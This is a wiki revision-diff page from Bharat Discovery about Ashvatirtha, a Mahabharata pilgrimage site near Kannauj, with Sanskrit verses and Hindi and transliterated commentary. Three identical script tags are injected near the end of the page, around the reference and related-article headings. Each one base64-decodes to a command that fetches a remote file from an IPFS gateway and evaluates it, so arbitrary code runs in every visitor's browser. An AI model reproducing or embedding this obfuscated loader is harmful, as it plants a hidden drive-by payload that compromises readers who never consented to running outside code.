Difference between revisions of "अश्वतीर्थ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:ऐतिहासिक स्थान कोश; Adding category Category:पौराणिक स्थान (को हटा दिया गया हैं।))
Line 1: Line 1:
{{पुनरीक्षण}}
+
*अश्वतीर्थ का वर्णन [[वन पर्व महाभारत|महाभारत, वन पर्व]] के तीर्थपर्व के अंतर्गत है-  
अश्वतीर्थ का वर्णन [[वन पर्व महाभारत|महाभारत, वन पर्व]] के तीर्थपर्व के अंतर्गत है-  
 
 
<poem>'तत्रदेवान् पितृन विप्रांस्तर्पयित्वा पुन: पुन:,  
 
<poem>'तत्रदेवान् पितृन विप्रांस्तर्पयित्वा पुन: पुन:,  
 
कन्यातीर्थेऽश्वतीर्थे च गवां तीर्थे च भारत।'<ref>[[वन पर्व महाभारत]] 95, 3</ref></poem>
 
कन्यातीर्थेऽश्वतीर्थे च गवां तीर्थे च भारत।'<ref>[[वन पर्व महाभारत]] 95, 3</ref></poem>
यह स्थान [[कान्यकुब्ज]] या कन्नौज ([[उत्तर प्रदेश]]) के निकट गंगा कालिंदी संगम पर स्थित था। कान्यकुब्ज को इस उल्लेख में कन्यातीर्थ कहा गया है। यहाँ गाधि का तपोवन था। [[स्कंद पुराण]], नगरंखण्ड 165,37 के अनुसार ऋचीक मुनि को [[वरुण]] ने एक सहस्त्र अश्व दिए थे जिनको लेकर उन्होंने गाधि की पुत्री [[सत्यवती]] से विवाह किया था। इसी कारण इसे अश्वतीर्थ कहा जाता था-  
+
*यह स्थान [[कान्यकुब्ज]] या कन्नौज ([[उत्तर प्रदेश]]) के निकट गंगा कालिंदी संगम पर स्थित था।  
 +
*कान्यकुब्ज को इस उल्लेख में कन्यातीर्थ कहा गया है। यहाँ गाधि का तपोवन था।  
 +
*[[स्कंद पुराण]], नगरंखण्ड 165,37 के अनुसार ऋचीक मुनि को [[वरुण]] ने एक सहस्त्र अश्व दिए थे जिनको लेकर उन्होंने गाधि की पुत्री [[सत्यवती]] से विवाह किया था।  
 +
*इसी कारण इसे अश्वतीर्थ कहा जाता था-  
 
<poem>'तत: प्रभृति विख्यातमश्वतीर्थं धरातले,  
 
<poem>'तत: प्रभृति विख्यातमश्वतीर्थं धरातले,  
 
गंगातीरे शुभे पुण्ये कान्यकुब्जसमीपगम्'।</poem>  
 
गंगातीरे शुभे पुण्ये कान्यकुब्जसमीपगम्'।</poem>  
[[अनुशासन पर्व महाभारत|महाभारत, अनुशासन पर्व]] 4,17 में भी इसी कथा के प्रसंग में यह उल्लेख है-  
+
*[[अनुशासन पर्व महाभारत|महाभारत, अनुशासन पर्व]] 4,17 में भी इसी कथा के प्रसंग में यह उल्लेख है-  
 
<poem>'अदूरे कान्यकुब्जस्य गंगायास्तीरमुत्तमम्,  
 
<poem>'अदूरे कान्यकुब्जस्य गंगायास्तीरमुत्तमम्,  
 
अश्वतीर्थं तदद्यापि मानवै: परिक्ष्यते'।</poem>  
 
अश्वतीर्थं तदद्यापि मानवै: परिक्ष्यते'।</poem>  
पीछे कान्यकुब्ज का ही एक नाम अश्वतीर्थ पड़ गया था। वास्तव में यह दोनों स्थान सन्निकट रहे होंगे।  
+
*पीछे कान्यकुब्ज का ही एक नाम अश्वतीर्थ पड़ गया था।  
 +
*वास्तव में यह दोनों स्थान सन्निकट रहे होंगे।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
Line 22: Line 25:
 
[[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]]
 
[[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]]
 
[[Category:महाभारत]]
 
[[Category:महाभारत]]
[[Category:नया पन्ना]]
 
 
[[Category:पौराणिक स्थान]]
 
[[Category:पौराणिक स्थान]]
 
__INDEX__
 
__INDEX__

Revision as of 07:28, 20 August 2011

'tatradevanh pitrin vipraanstarpayitva pun: pun:,
kanyatirtheashvatirthe ch gavaan tirthe ch bharat.'[1]

  • yah sthan kanyakubj ya kannauj (uttar pradesh) ke nikat ganga kaliandi sangam par sthit tha.
  • kanyakubj ko is ullekh mean kanyatirth kaha gaya hai. yahaan gadhi ka tapovan tha.
  • skand puran, nagarankhand 165,37 ke anusar rrichik muni ko varun ne ek sahastr ashv die the jinako lekar unhoanne gadhi ki putri satyavati se vivah kiya tha.
  • isi karan ise ashvatirth kaha jata tha-

'tat: prabhriti vikhyatamashvatirthan dharatale,
gangatire shubhe punye kanyakubjasamipagamh'.

'adoore kanyakubjasy gangayastiramuttamamh,
ashvatirthan tadadyapi manavai: parikshyate'.

  • pichhe kanyakubj ka hi ek nam ashvatirth p d gaya tha.
  • vastav mean yah donoan sthan sannikat rahe hoange.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>